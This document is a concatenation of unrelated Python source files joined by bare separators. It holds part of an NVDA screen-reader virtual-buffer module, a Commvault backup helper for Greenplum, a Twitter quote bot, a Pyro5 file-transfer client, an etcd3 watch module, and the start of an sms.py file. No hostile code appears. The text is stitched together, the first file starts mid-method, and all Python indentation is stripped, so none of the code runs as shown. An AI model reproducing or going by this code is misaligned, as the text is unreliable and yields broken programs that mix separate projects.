# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
# The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(target=self._loadBuffer).start()
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(self.rootNVDAObject.appModule.helperLocalBindingHandle,self.rootDocHandle,self.rootID,unicode(self.backendName))
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=unicode(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttribsForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
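# Worked example (illustrative): moving "next" along the "row" axis from a cell in
# row 2 that spans 2 rows targets row 4 in the same column, while moving "previous"
# along the "column" axis from column 3 targets column 2.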
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self,range):
return (range._endOffset-range._startOffset)>=self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self,range):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in range.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets=range._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
if not self.VBufHandle:
# #4859: The buffer was unloaded after this method was queued.
return
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = unicode(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
|
CvContext.py
|
#!/usr/bin/env python
#
# Copyright (c) Commvault Systems (2016). All Rights Reserved.
#
'''
Commvault integration with Greenplum data protection
This Module contains some helper functions for storing information needed
to run Greenplum backup and restore using Commvault
Typical usage:
from gppylib import CvContext
CvCtx = CvContext()
if options.verbose:
gplog.enable_verbose_logging()
if options.quiet:
gplog.quiet_stdout_logging()
logger.info("Start myTool")
...
'''
import datetime
import os
import errno
import sys
import re
from gppylib import gplog
from gppylib.commands.base import Command
import threading
import time
from Queue import Queue
import fcntl
try:
import subprocess32 as subprocess
except ImportError:
import subprocess
logger = gplog.get_default_logger()
class CvContext():
def __init__(self, cv_clientname, cv_instance, cv_proxy_host, cv_proxy_port, cv_proxy_file, cv_dbname=None, cv_jobType='BACKUP', incremental=False, verbose=False, debuglevel=0):
#-- Initialize context
self.cv_job_id = 0
self.cv_job_token = 0
self._commcellid = 0
self.cv_clientid = 0
self.cv_instanceid = 0
self._cv_subclient_id = 0
self.cv_appid = '0:0'
self.cv_backupsetid = 0
self.cv_jobstatus = 1
self.cv_prefix = None
self._backup_file_list = []
self._backup_file_guids = {}
self.cv_apptype = 'Q_DISTRIBUTED_IDA'
self.cv_logfile = os.path.dirname(gplog.get_logfile()) + "/cv_backup.log"
if debuglevel > 0:
self.cv_debuglvl = debuglevel
elif verbose:
self.cv_debuglvl = 1
else:
self.cv_debuglvl = 0
self.queue = Queue()
logger.debug("Logging Commvault-specific entries to: %s\n", self.cv_logfile)
if cv_clientname is not None:
self.cv_clientname = cv_clientname
if cv_instance is not None:
self.cv_instance = cv_instance
command_string = "CVBkpRstWrapper -jobStart --cv-streams 1 --cv-clientname %s --cv-instance %s --cv-debuglvl %s" % (self.cv_clientname, self.cv_instance, self.cv_debuglvl)
if cv_dbname is not None:
self.cv_subclient = "cv%s" % cv_dbname
command_string += " --cv-subclient %s" % self.cv_subclient
if cv_jobType == "RESTORE":
command_string += " --cv-jobtype RESTORE"
else:
command_string += " --cv-jobtype BACKUP"
if incremental:
command_string += " --cv-bkplvl INCR"
else:
command_string += " --cv-bkplvl FULL"
if cv_proxy_host is not None:
self.cv_proxy_host = cv_proxy_host
if cv_proxy_port is not None:
self.cv_proxy_port = cv_proxy_port
else:
self.cv_proxy_port = 8400
command_string += " --cv-proxy-host %s --cv-proxy-port %s" % (self.cv_proxy_host, self.cv_proxy_port)
elif cv_proxy_file is not None:
self.cv_proxy_file = cv_proxy_file
command_string += " --cv-apptype Q_DISTRIBUTED_IDA"
        #-- Start a polling thread for the CVBkpRstWrapper controller
t = threading.Thread(target=cv_job_controller, name='cv_job_controller',args=[self,command_string],kwargs={})
t.start()
def get_backup_files(self, timestamp, dbname=None):
if timestamp > 0:
logger.debug("Searching for browse times for timestamp %s" % timestamp)
query_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-instanceId %s --cv-backupsetId %s --cv-filename \"*%s.rpt\" --cv-debuglvl %s --cv-search-allcycles 1" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_instanceid, self.cv_backupsetid, timestamp, self.cv_debuglvl)
logger.debug("Command string for get_backup_files: %s\n", query_string)
query = Command("Getting file info from the Commserve", query_string)
query.run(validateAfter=True)
file_info = query.get_results().stdout.split('\n')
if len(file_info) > 0:
for line in file_info:
if len(line.strip()) > 0:
(fname, oguid, cvguid, fromtime, totime, self._commcellid, self._cv_subclient_id) = line.strip().split(':')
self.cv_prefix = fname[(fname.rfind("/") + 1):fname.rfind("gp_")]
self.cv_subclient = self.cv_prefix[:-1]
self.cv_appid = self._commcellid + ":" + self._cv_subclient_id
#command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-instanceId %s --cv-backupsetId %s --cv-filename \"/\" --cv-browse-fromtime %s --cv-browse-totime %s --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_instanceid, self.cv_backupsetid, fromtime, totime, self.cv_debuglvl)
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"/\" --cv-browse-fromtime %s --cv-browse-totime %s --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, fromtime, totime, self.cv_debuglvl)
else:
raise Exception("No backup files found for timestamp %s" % timestamp)
elif dbname is not None:
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-instanceId %s --cv-backupsetId %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"*%s*\" --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_instanceid, self.cv_backupsetid, self.cv_clientid, dbname, self.cv_debuglvl)
else:
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"*\" --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_debuglvl)
logger.debug("Command string for get_backup_files': %s\n", command_string)
cmd = Command("Getting list of backup files from the Commserve", command_string)
cmd.run(validateAfter=True)
files_list = cmd.get_results().stdout.split('\n')
for line in files_list:
if len(line.strip()) > 0:
(fname, oguid, cvguid, self._commcellid, self._cv_subclient_id) = line.strip().split(':')
self._backup_file_guids[fname] = cvguid
logger.debug("Caching file [%s] with GUID [%s]" % (fname, cvguid))
self.cv_appid = self._commcellid + ":" + self._cv_subclient_id
        self._backup_file_list = sorted(self._backup_file_guids.keys(), reverse=True)
# For restore scenarios with -s <dbname>
# look for the restore timestamp in the latest backup report file name
if timestamp == 0:
for file in self._backup_file_list:
if ".rpt" in file:
list = file.split('.')
list2 = list[0].split('_')
timestamp = list2.pop()
logger.debug("Found restore timestamp=%s for database=%s",timestamp, dbname)
break
self.cv_prefix = "cv" + dbname + "_"
return timestamp
def get_file_guid(self, fname):
for file in self._backup_file_list:
if os.path.basename(fname) == os.path.basename(file):
return self._backup_file_guids[file]
return False
def cv_exit(self):
#self.cv_context.queue.task_done()
        if self.processHandle.poll() is None:
logger.debug("Sending GP exit status (%d) to CVBkpRstWrapper",self.cv_jobstatus)
named_fifo = "/tmp/CVBkpRstWrapper_read_fifo"
fd = -1
try:
fd = os.open(named_fifo, os.O_WRONLY| os.O_NONBLOCK)
os.write(fd, '%d'%self.cv_jobstatus)
except OSError as err:
logger.debug("CVBkpRstWrapper is NOT listening for GP exit status. errno=%d",err.errno)
#fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NDELAY | os.O_NONBLOCK)
        if fd != -1:
os.close(fd)
return self.cv_jobstatus
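#-- Hedged illustration (not part of the original module): a minimal sketch of how a
#-- CvContext might be constructed for a backup job. Every value below is a hypothetical
#-- placeholder chosen for this example, not a documented default.
def _example_cv_context():
    ctx = CvContext(cv_clientname='gpclient01',     # hypothetical Commvault client name
                    cv_instance='Instance001',      # hypothetical Commvault instance
                    cv_proxy_host='cvproxy.local',  # hypothetical proxy host
                    cv_proxy_port=8400,
                    cv_proxy_file=None,
                    cv_dbname='gpadmin',            # hypothetical database name
                    cv_jobType='BACKUP',
                    incremental=False)
    # The constructor launches cv_job_controller() in a thread; block here until it
    # has published clientId/appId/jobId into the context before using them.
    ctx.queue.get()
    return ctx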
def cv_job_controller(cv_context, command_string):
logger.debug("Command string for initializing CV context: %s",command_string)
#cmd = Command("CVContext", command_string)
#cmd.run(validateAfter=True)
wrapperOutput = ''
args = command_string.split()
cv_context.processHandle = subprocess.Popen(args, stdout=subprocess.PIPE)
fcntl.fcntl(cv_context.processHandle.stdout, fcntl.F_SETFL, os.O_NDELAY | os.O_NONBLOCK)
firstTime = True
    while cv_context.processHandle.poll() is None:
if firstTime:
logger.debug("Launched CVBkpRstWrapper controller PID:%d", cv_context.processHandle.pid)
firstTime = False
try:
wrapperOutput = cv_context.processHandle.stdout.read()
except IOError:
pass
if wrapperOutput:
logger.debug("Received context %s", wrapperOutput)
wrapperOutput = wrapperOutput.strip()
for cmdToken in wrapperOutput.split(','):
(tokId, tokVal) = cmdToken.split('=')
if tokId == 'commcellId':
cv_context._commcellid = tokVal
elif tokId == 'clientId':
cv_context.cv_clientid = tokVal
elif tokId == 'instanceId':
cv_context.cv_instanceid = tokVal
elif tokId == 'appId':
cv_context._cv_subclient_id = tokVal
elif tokId == 'backupsetId':
cv_context.cv_backupsetid = tokVal
elif tokId == 'jobId':
cv_context.cv_job_id = tokVal
elif tokId == 'jobToken':
cv_context.cv_job_token = tokVal
cv_context.cv_appid = cv_context._commcellid + ":" + cv_context._cv_subclient_id
# Notify the main thread to consume clientId, appId, jobId, jobToken from CvContext object
cv_context.queue.put('CV context updated')
            break
#-- Monitor the CVBkpRstWrapper controller session
    while cv_context.processHandle.poll() is None:
        time.sleep(10)  # set polling timer
        #logger.debug("CV Thread: Polling CVBkpRstWrapper controller PID [%d]....", cv_context.processHandle.pid)
logger.debug("CVBkpRstWrapper controller session PID [%d] is NOT alive", cv_context.processHandle.pid)
|
app.py
|
import pandas as pd
import numpy as np
import schedule
from config import create_api
import tweepy
import time
import random
import threading
ht1 = [
'#books', '#bookstagram', '#book', '#booklover', '#reading', '#bookworm', '#bookstagrammer', '#bookish', '#read',
'#booknerd', '#bookaddict', '#bibliophile', '#booksofinstagram', '#instabook', '#bookaholic',
'#bookshelf', '#booksbooksbooks', '#libros', '#readersofinstagram', '#bookphotography',
'#booklove', '#art', '#literature', '#author',
'#quotestagram', '#quotes', '#quoteoftheday', '#quotestoliveby', '#quote', '#inspirationalquotes', '#love',
'#motivationalquotes', '#poetry', '#motivation', '#life', '#inspiration', '#quotesdaily', '#loveyourself',
'#positivevibes','#happy', '#success', '#quotesaboutlife', '#believe', '#selflove',
'#happiness', '#thoughts', '#lifequotes'
]
CHAR_MAX = 280
api = create_api()
df = pd.read_csv('QUOTE.csv', delimiter=';')
dash = '―'
def tweet_now(msg):
try:
api.update_status(msg[0:CHAR_MAX])
except Exception as e:
print(e)
def get_quote(df):
n = df.shape[0]
rand_idx = np.random.choice(n, size=1, replace=False)
row = df.iloc[rand_idx]
df = df.drop(rand_idx)
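    # Note: this drop only affects the local copy of df; the module-level DataFrame is left
    # untouched, so the same quote may be picked again on later calls.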
return row
def get_tweet():
qt = get_quote(df)
quote = qt.iloc[0]['QUOTE']
author = qt.iloc[0]['AUTHOR']
tweet = f'{quote}\n- {author}'
if len(tweet) > CHAR_MAX:
return ''
return tweet
def get_hashtags():
ht = random.sample(ht1, 7)
return '\n' + ' '.join(ht)
def tweet_quote():
tweet = get_tweet()
if len(tweet) == 0:
print('skipping this tweet')
return ''
htag = get_hashtags()
txt = tweet + htag
tweet_now(txt)
print(txt)
def run_threaded(job_fn):
job_thread = threading.Thread(target=job_fn)
job_thread.start()
schedule.every(2).hours.do(run_threaded, tweet_quote)
while True:
schedule.run_pending()
time.sleep(1)
|
client.py
|
import time
import threading
import socket
import zlib
import sys
import serpent
from Pyro5.api import Proxy, current_context
def regular_pyro(uri):
blobsize = 10*1024*1024
num_blobs = 10
total_size = 0
start = time.time()
name = threading.currentThread().name
with Proxy(uri) as p:
for _ in range(num_blobs):
print("thread {0} getting a blob using regular Pyro call...".format(name))
data = p.get_with_pyro(blobsize)
data = serpent.tobytes(data) # in case of serpent encoded bytes
total_size += len(data)
assert total_size == blobsize*num_blobs
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def via_iterator(uri):
blobsize = 10*1024*1024
num_blobs = 10
total_size = 0
start = time.time()
name = threading.currentThread().name
with Proxy(uri) as p:
for _ in range(num_blobs):
print("thread {0} getting a blob using remote iterators...".format(name))
for chunk in p.iterator(blobsize):
chunk = serpent.tobytes(chunk) # in case of serpent encoded bytes
total_size += len(chunk)
assert total_size == blobsize*num_blobs
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def via_annotation_stream(uri):
name = threading.currentThread().name
start = time.time()
total_size = 0
print("thread {0} downloading via annotation stream...".format(name))
with Proxy(uri) as p:
perform_checksum = False
for progress, checksum in p.annotation_stream(perform_checksum):
chunk = current_context.response_annotations["FDAT"]
if perform_checksum and zlib.crc32(chunk) != checksum:
raise ValueError("checksum error")
total_size += len(chunk)
assert progress == total_size
current_context.response_annotations.clear() # clean them up once we're done with them
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def raw_socket(uri):
blobsize = 40*1024*1024
num_blobs = 10
total_size = 0
name = threading.currentThread().name
with Proxy(uri) as p:
print("thread {0} preparing {1} blobs of size {2} Mb".format(name, num_blobs, blobsize/1024.0/1024.0))
blobs = {}
for _ in range(num_blobs):
file_id, blob_address = p.prepare_file_blob(blobsize)
blobs[file_id] = blob_address
start = time.time()
for file_id in blobs:
print("thread {0} retrieving blob using raw socket...".format(name))
blob_address = blobs[file_id]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(tuple(blob_address))
sock.sendall(file_id.encode())
size = 0
chunk = b"dummy"
while chunk:
chunk = sock.recv(60000)
size += len(chunk)
sock.close()
assert size == blobsize
total_size += size
duration = time.time() - start
assert total_size == blobsize * num_blobs
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
if __name__ == "__main__":
uri = input("Uri of filetransfer server? ").strip()
print("\n\n**** regular pyro calls ****\n")
t1 = threading.Thread(target=regular_pyro, args=(uri, ))
t2 = threading.Thread(target=regular_pyro, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** transfer via iterators ****\n")
t1 = threading.Thread(target=via_iterator, args=(uri, ))
t2 = threading.Thread(target=via_iterator, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** transfer via annotation stream ****\n")
t1 = threading.Thread(target=via_annotation_stream, args=(uri, ))
t2 = threading.Thread(target=via_annotation_stream, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** raw socket transfers ****\n")
t1 = threading.Thread(target=raw_socket, args=(uri, ))
t2 = threading.Thread(target=raw_socket, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to exit:")
|
watch.py
|
import logging
import threading
import grpc
import six
from six.moves import queue
import etcd3.etcdrpc as etcdrpc
import etcd3.events as events
import etcd3.exceptions as exceptions
import etcd3.utils as utils
_log = logging.getLogger(__name__)
class Watch(object):
def __init__(self, watch_id, iterator=None, etcd_client=None):
self.watch_id = watch_id
self.etcd_client = etcd_client
self.iterator = iterator
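        # Note: when an iterator is passed in, this attribute shadows the iterator()
        # method defined below for this instance.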
def cancel(self):
self.etcd_client.cancel_watch(self.watch_id)
def iterator(self):
if self.iterator is not None:
return self.iterator
raise ValueError('Undefined iterator')
class Watcher(object):
def __init__(self, watchstub, client_closed_event, timeout=None, call_credentials=None,
metadata=None):
self.timeout = timeout
self._watch_stub = watchstub
self._credentials = call_credentials
self._metadata = metadata
self._client_closed_event = client_closed_event
self._lock = threading.Lock()
self._request_queue = queue.Queue(maxsize=10)
self._callbacks = {}
self._callback_thread = None
self._new_watch_cond = threading.Condition(lock=self._lock)
self._new_watch = None
def add_callback(self, key, callback, range_end=None, start_revision=None,
progress_notify=False, filters=None, prev_kv=False):
create_watch = etcdrpc.WatchCreateRequest()
create_watch.key = utils.to_bytes(key)
if range_end is not None:
create_watch.range_end = utils.to_bytes(range_end)
if start_revision is not None:
create_watch.start_revision = start_revision
if progress_notify:
create_watch.progress_notify = progress_notify
if filters is not None:
create_watch.filters = filters
if prev_kv:
create_watch.prev_kv = prev_kv
rq = etcdrpc.WatchRequest(create_request=create_watch)
with self._lock:
# Start the callback thread if it is not yet running.
if not self._callback_thread:
thread_name = 'etcd3_watch_%x' % (id(self),)
self._callback_thread = threading.Thread(name=thread_name,
target=self._run)
self._callback_thread.daemon = True
self._callback_thread.start()
# Only one create watch request can be pending at a time, so if
            # there is one already, then wait for it to complete first.
while self._new_watch:
self._new_watch_cond.wait()
# Submit a create watch request.
new_watch = _NewWatch(callback)
self._request_queue.put(rq)
self._new_watch = new_watch
# Wait for the request to be completed, or timeout.
self._new_watch_cond.wait(timeout=self.timeout)
self._new_watch = None
            # If the request has not completed yet, then raise a timeout exception.
if new_watch.id is None and new_watch.err is None:
raise exceptions.WatchTimedOut()
# Raise an exception if the watch request failed.
if new_watch.err:
raise new_watch.err
# Wake up threads stuck on add_callback call if any.
self._new_watch_cond.notify_all()
return new_watch.id
def cancel(self, watch_id):
with self._lock:
callback = self._callbacks.pop(watch_id, None)
if not callback:
return
self._cancel_no_lock(watch_id)
def _run(self):
while not self._client_closed_event.is_set():
response_iter = self._watch_stub.Watch(
_new_request_iter(self._request_queue),
credentials=self._credentials,
metadata=self._metadata)
try:
for rs in response_iter:
self._handle_response(rs)
except grpc.RpcError as err:
with self._lock:
if self._new_watch:
self._new_watch.err = err
self._new_watch_cond.notify_all()
callbacks = self._callbacks
self._callbacks = {}
# Rotate request queue. This way we can terminate one gRPC
# stream and initiate another one whilst avoiding a race
# between them over requests in the queue.
self._request_queue.put(None)
self._request_queue = queue.Queue(maxsize=10)
for callback in six.itervalues(callbacks):
_safe_callback(callback, err)
def _handle_response(self, rs):
with self._lock:
if rs.created:
# If the new watch request has already expired then cancel the
# created watch right away.
if not self._new_watch:
self._cancel_no_lock(rs.watch_id)
return
if rs.compact_revision != 0:
self._new_watch.err = exceptions.RevisionCompactedError(
rs.compact_revision)
return
self._callbacks[rs.watch_id] = self._new_watch.callback
self._new_watch.id = rs.watch_id
self._new_watch_cond.notify_all()
callback = self._callbacks.get(rs.watch_id)
# Ignore leftovers from canceled watches.
if not callback:
return
# The watcher can be safely reused, but adding a new event
# to indicate that the revision is already compacted
# requires api change which would break all users of this
# module. So, raising an exception if a watcher is still
# alive.
if rs.compact_revision != 0:
err = exceptions.RevisionCompactedError(rs.compact_revision)
_safe_callback(callback, err)
self.cancel(rs.watch_id)
return
for event in rs.events:
_safe_callback(callback, events.new_event(event))
def _cancel_no_lock(self, watch_id):
cancel_watch = etcdrpc.WatchCancelRequest()
cancel_watch.watch_id = watch_id
rq = etcdrpc.WatchRequest(cancel_request=cancel_watch)
self._request_queue.put(rq)
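# Hedged illustration (not part of the upstream module): a minimal sketch of how a
# Watcher is typically driven once it has been constructed with a real gRPC watch stub.
# ``watcher`` and ``on_event`` below are hypothetical placeholders for this example.
def _example_watcher_usage(watcher):
    def on_event(event_or_err):
        # The same callback receives both watch events and terminal errors.
        if isinstance(event_or_err, Exception):
            _log.error('watch failed: %s', event_or_err)
        else:
            _log.info('watch event: %s', event_or_err)
    watch_id = watcher.add_callback('/my/key', on_event, prev_kv=True)
    # ... later, stop receiving events for this key:
    watcher.cancel(watch_id)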
class _NewWatch(object):
def __init__(self, callback):
self.callback = callback
self.id = None
self.err = None
def _new_request_iter(_request_queue):
while True:
rq = _request_queue.get()
if rq is None:
return
yield rq
def _safe_callback(callback, event_or_err):
try:
callback(event_or_err)
except Exception:
_log.exception('Watch callback failed')
|
sms.py
|
from os.path import abspath as abspath
from os.path import dirname as dirname
from os.path import join as join
import sys, json
import logging
